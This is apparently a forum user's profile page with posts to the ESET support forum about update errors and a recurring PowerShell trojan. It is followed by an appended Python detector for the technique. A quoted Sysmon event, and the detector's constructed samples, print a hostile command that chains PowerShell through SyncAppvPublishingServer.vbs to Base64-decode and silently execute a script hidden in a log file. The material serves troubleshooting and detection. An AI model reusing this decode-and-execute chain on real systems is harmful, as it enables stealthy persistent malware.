TedH600

Members
  • Posts

    21

About TedH600

  • Rank
    Newbie

Profile Information

  • Location
    USA
  1. Hello, I tried pinging a few of the Eset Livegrid servers as shown on https://support.eset.com/en/kb332-ports-and-addresses-required-to-use-your-eset-product-with-a-third-party-firewall, and I could reach them. Thank you for your help.
  2. Hello, Eset seems to have started updating itself as of yesterday. But now I am receiving a message stating that "the Eset Liveguard servers cannot be reached". I am using Eset's own firewall. I have never seen this error before. Is something wrong with my new license? A screenshot is attached. Thank you for your help.
  3. Hello, Running the task in task scheduler works. As I stated above, I haven't upgraded to the latest version because of the problem with the bogus error messages in Windows Event Viewer Eset logged every day. (I did try the latest version a while back.) I have attached screenshots of my scheduler and update settings. I believe that this problem started shortly after my license was renewed. Thank you for your help.
  4. Hello, I have a licensed version of Eset Smart Security Premium version 16.2.15.0. I renewed my license on 1/30/24. I am still using this older version because the latest version records bogus errors in the event log every day. Eset is not updating the detection engine automatically anymore. I just noticed this today. I have to update manually now. I tried clearing the update cache, but the problem persists. I checked the Eset scheduler and nothing seems to have changed. I am running Windows 10 Pro 64bit with all of the latest updates. I attached a log file. The first two entries are when I updated manually. Your help is appreciated.
  5. Hello, I see that this has already been reported in https://forum.eset.com/topic/38760-windows-security-center-service-unable-to-load-instances-of-antivirusproduct-from-datastore/. Thank you.
  6. Hello, I am receiving two Event Log errors with the descriptions "The Windows Security Center Service was unable to load instances of FirewallProduct from datastore" and "The Windows Security Center Service was unable to load instances of AntiVirusProduct from datastore" at every login with Eset Smart Security Premium version 17.0.15.0. I am running Windows 10 Pro 64 bit with all of the latest updates. Is Eset running and protecting my computer properly? Your help is appreciated.
  7. Hello, The Netservices task seems to be a known virus as shown here https://forums.malwarebytes.com/topic/286247-netservices/. In the future, can Eset detect these task scheduler viruses before they are installed on the PC? Can I configure Eset to notify me of changes to the Task Scheduler? I saw this post https://forum.eset.com/topic/4602-windows-task-scheduler-protection/, but it is from 2015. Thank you again.
  8. Hello, Deleting the task seems to have stopped the problem. Is there a way that I can quickly check for bogus tasks in case something like this happens again? By the way, my task files were stored in C:\Windows\System32\Tasks. I didn't have a "Scheduled Tasks" folder. What was the PowerShell/Agent.AEW trojan trying to do? If a new scan shows that my PC is clean, is the PC safe to use? Thank you very much.
  9. Hello, I attached the log files from Eset and Autoruns above. I have noticed that the Windows tray icon that shows that my location is in use stays on until the Eset threat detection message displays. The Eset threat detection message shows up about 60 seconds after the desktop is displayed. Right after that, the location icon disappears. I don't know if the virus is accessing my location. As I said earlier, the sysmon event log that I posted above shows that this might be a Windows WMI virus. Thank you.
  10. Hello, I deleted the C:\Windows\logs\system-logs.txt file. It no longer exists, but the virus keeps coming back upon reboot. The Eset virus detection keeps referencing the C:\Windows\logs\system-logs.txt file even though it does not exist. As I said earlier, the sysmon event log that I posted above shows that this might be a Windows WMI virus. Thank you.
  11. Hello, I installed sysmon. There might be something hiding in Windows WMI. The following is a sysmon event I logged at Windows startup.

      <Event xmlns="hxxp://schemas.microsoft.com/win/2004/08/events/event">
        <System>
          <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
          <EventID>1</EventID>
          <Version>5</Version>
          <Level>4</Level>
          <Task>1</Task>
          <Opcode>0</Opcode>
          <Keywords>0x8000000000000000</Keywords>
          <TimeCreated SystemTime="2022-05-03T01:50:03.1731667Z" />
          <EventRecordID>296</EventRecordID>
          <Correlation />
          <Execution ProcessID="4876" ThreadID="5456" />
          <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
          <Computer>Linda-2</Computer>
          <Security UserID="S-1-5-18" />
        </System>
        <EventData>
          <Data Name="RuleName">-</Data>
          <Data Name="UtcTime">2022-05-03 01:50:03.166</Data>
          <Data Name="ProcessGuid">{d1df58dd-8a4b-6270-a800-00000000e205}</Data>
          <Data Name="ProcessId">10736</Data>
          <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
          <Data Name="FileVersion">10.0.19041.546 (WinBuild.160101.0800)</Data>
          <Data Name="Description">Windows PowerShell</Data>
          <Data Name="Product">Microsoft® Windows® Operating System</Data>
          <Data Name="Company">Microsoft Corporation</Data>
          <Data Name="OriginalFileName">PowerShell.EXE</Data>
          <Data Name="CommandLine">"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}</Data>
          <Data Name="CurrentDirectory">C:\WINDOWS\system32\</Data>
          <Data Name="User">LINDA-2\Administrator</Data>
          <Data Name="LogonGuid">{d1df58dd-8a0f-6270-c39f-040000000000}</Data>
          <Data Name="LogonId">0x49fc3</Data>
          <Data Name="TerminalSessionId">1</Data>
          <Data Name="IntegrityLevel">High</Data>
          <Data Name="Hashes">SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F</Data>
          <Data Name="ParentProcessGuid">{d1df58dd-8a4b-6270-a700-00000000e205}</Data>
          <Data Name="ParentProcessId">10504</Data>
          <Data Name="ParentImage">C:\Windows\System32\wscript.exe</Data>
          <Data Name="ParentCommandLine">C:\WINDOWS\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" "n; $a=Get-Content "C:\Windows\logs\system-logs.txt" | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block</Data>
          <Data Name="ParentUser">LINDA-2\Administrator</Data>
        </EventData>
      </Event>

      Thank you.
  12. Hello, I have attached the C:\Windows\logs\system-logs.txt file. Eset found no viruses in it. Thank you. system-logs.txt
  13. Hello, I have attached the Eset log collector data. Thank you. eis_logs.zip
  14. Hello, What is PowerShell/Agent.AEW trojan? I can find no information on it. When Eset states that it deleted the threat, what file is it deleting? I renamed the C:\Windows\logs\system-logs.txt file referenced in the virus detection. It doesn't appear to have been recreated. Thank you.
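
A detection check for the kind of Sysmon process-creation event quoted in post 11, as an added example that is not part of the original posts or of any ESET tooling. The function names, the finding strings and both sample events are constructed for illustration; the samples are modelled on the posted event and XML-escaped so they parse.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

def make_event(image, cmdline, parent_image, parent_cmdline):
    """Build a minimal, constructed Sysmon Event ID 1 record (XML-escaped)."""
    fields = {"Image": image, "CommandLine": cmdline,
              "ParentImage": parent_image, "ParentCommandLine": parent_cmdline}
    data = "".join(f'<Data Name="{k}">{escape(v)}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>1</EventID></System>'
            f"<EventData>{data}</EventData></Event>")

def analyze(event_xml):
    """Return a list of findings for one Sysmon process-creation event."""
    root = ET.fromstring(event_xml)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "1":
        return []
    f = {d.get("Name"): d.text or "" for d in root.iterfind("e:EventData/e:Data", NS)}
    findings = []
    # The script expects a server name; a ';' in its argument chains extra PowerShell.
    arg = re.search(r'SyncAppvPublishingServer\.vbs"?\s+(.*)',
                    f.get("ParentCommandLine", ""), re.I | re.S)
    if arg and ";" in arg.group(1):
        findings.append("SyncAppvPublishingServer.vbs argument carries chained commands")
    cmd = f.get("CommandLine", "")
    if f.get("Image", "").lower().endswith("\\powershell.exe"):
        decodes = re.search(r"FromBase64String", cmd, re.I)
        executes = re.search(r"\[scriptblock\]::Create|Invoke-Expression|\biex\b", cmd, re.I)
        if decodes and executes:
            findings.append("PowerShell decodes Base64 and executes the result")
            src = re.search(r'Get-Content\s+"?([^\s"|;]+)', cmd, re.I)
            if src:
                findings.append(f"payload read from {src.group(1)}")
    return findings

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PAYLOAD = (r"$a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;"
           "$d=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a));"
           "Invoke-Command ([Scriptblock]::Create($d))")
# Constructed samples: one shaped like the event in post 11, one ordinary launch.
SUSPICIOUS = make_event(
    PS, f'"{PS}" -NonInteractive -WindowStyle Hidden -Command &{{Sync-AppvPublishingServer n; {PAYLOAD}}}',
    r"C:\Windows\System32\wscript.exe",
    r'C:\WINDOWS\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" "n; ' + PAYLOAD)
BENIGN = make_event(PS, f'"{PS}" -NoProfile -Command Get-Date',
                    r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe")
```

Calling `analyze(SUSPICIOUS)` returns three findings, the last naming the staging file, while `analyze(BENIGN)` returns an empty list.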